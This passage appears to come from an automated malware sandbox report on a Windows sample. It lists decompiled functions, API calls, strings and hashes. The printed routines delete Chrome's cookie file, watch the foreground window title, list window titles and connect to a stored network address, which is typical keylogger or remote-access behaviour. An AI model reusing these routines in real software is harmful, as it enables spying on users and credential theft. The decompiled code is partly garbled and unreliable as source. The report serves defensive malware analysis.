                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                        • String ID:
                                        • API String ID: 3751107300-0
                                        • Opcode ID: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                        • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                        • Opcode Fuzzy Hash: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                        • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040EA96, Relevance: 27.1, APIs: 18, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowTextW.USER32 ref: 0040EAAF
                                        • IsWindowVisible.USER32(?), ref: 0040EAB8
                                        • sprintf.MSVCRT ref: 0040EACF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                        • String ID:
                                        • API String ID: 1480451481-0
                                        • Opcode ID: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                        • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                        • Opcode Fuzzy Hash: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                        • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004071CF, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 32%
                                        			E004071CF() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome Cookies found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome Cookies not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                        0x004071e4
                                        0x004071ef
                                        0x004071f6
                                        0x004071fa
                                        0x00407205
                                        0x0040720e
                                        0x0040721d
                                        0x00407271
                                        0x00407277
                                        0x0040727f
                                        0x00407281
                                        0x00407284
                                        0x00000000
                                        0x0040728a
                                        0x00407226
                                        0x00407227
                                        0x0040725c
                                        0x00407238
                                        0x0040723e
                                        0x00407244
                                        0x0040724f
                                        0x00000000
                                        0x00407255
                                        0x0040722a
                                        0x00407233
                                        0x00000000
                                        0x00407236
                                        0x0040722c
                                        0x00000000

                                        APIs
                                        • getenv.MSVCRT ref: 004071E4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                        • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                        • GetLastError.KERNEL32 ref: 0040721F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                        Strings
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                        • UserProfile, xrefs: 004071DF
                                        • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                        • [Chrome Cookies not found], xrefs: 00407239
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 3740952235-304995407
                                        • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                        • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                        • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                        • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405812, Relevance: 25.6, APIs: 17, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                        • String ID:
                                        • API String ID: 257471410-0
                                        • Opcode ID: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                        • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                        • Opcode Fuzzy Hash: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                        • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412F73, Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 30%
                                        			E00412F73(char _a4, void* _a20) {
				char _v5;
				void* _v24;
				char _v40;
				int _t26;
				int _t29;
				void* _t37;
				unsigned int _t66;
				signed int _t67;
				int _t70;
				signed short _t73;
				struct HWND__* _t81;
				void* _t83;

				_t81 = GetForegroundWindow();
				_t26 = GetWindowTextLengthA(_t81);
				_t89 = _t26;
				if(_t26 <= 0) {
					L6:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				}
				_t28 = _t26 + 1;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				E00413A29(_t29, _t29, _t29, __imp__tolower);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
				_t73 = 0;
				if(E00401838( &_v40) <= 0) {
					L5:
					E004017DD( &_v40);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L6;
				}
				_t82 = 0;
				while(1) {
					_t37 = E0040180C( &_v40, 0, _t82);
					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						break;
					}
					_t73 = _t73 + 1;
					_t82 = _t73 & 0x0000ffff;
					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
						continue;
					}
					goto L5;
				}
				__eflags = _a20;
				if(_a20 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					asm("repne scasb");
					_t66 =  !( &_v24 | 0xffffffff);
					_t83 = _t37 - _t66;
					_t67 = _t66 >> 2;
					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
					__eflags = _t70;
					memcpy(_t83 + _t67 + _t67, _t83, _t70);
				}
				E004017DD( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 1;
			}















                                        0x00412f81
                                        0x00412f84
                                        0x00412f8a
                                        0x00412f8c
                                        0x00413063
                                        0x00413066
                                        0x00000000
                                        0x0041306c
                                        0x00412f95
                                        0x00412f9d
                                        0x00412fa6
                                        0x00412fb0
                                        0x00412fb8
                                        0x00412fc7
                                        0x00412fd1
                                        0x00412fdb
                                        0x00412fe2
                                        0x00412ff2
                                        0x00413001
                                        0x0041300b
                                        0x00413016
                                        0x0041301f
                                        0x00413052
                                        0x00413055
                                        0x0041305d
                                        0x00000000
                                        0x0041305d
                                        0x00413021
                                        0x00413023
                                        0x00413029
                                        0x00413032
                                        0x00413040
                                        0x00000000
                                        0x00000000
                                        0x00413042
                                        0x00413046
                                        0x00413050
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00413050
                                        0x00413072
                                        0x00413076
                                        0x0041307b
                                        0x00413088
                                        0x0041308a
                                        0x00413090
                                        0x00413095
                                        0x0041309c
                                        0x0041309c
                                        0x0041309f
                                        0x0041309f
                                        0x004130a4
                                        0x004130ac
                                        0x004130b5
                                        0x00000000

                                        APIs
                                        • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                        • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                        • GetWindowTextA.USER32 ref: 00412FB8
                                        • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                        • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                        • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                        • String ID:
                                        • API String ID: 3496238640-0
                                        • Opcode ID: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                        • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                        • Opcode Fuzzy Hash: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                        • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004053DA, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 85sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00405423
                                          • Part of subcall function 00412F73: GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                          • Part of subcall function 00412F73: GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                          • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                          • Part of subcall function 00412F73: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                          • Part of subcall function 00412F73: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                          • Part of subcall function 00412F73: GetWindowTextA.USER32 ref: 00412FB8
                                          • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                          • Part of subcall function 00412F73: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
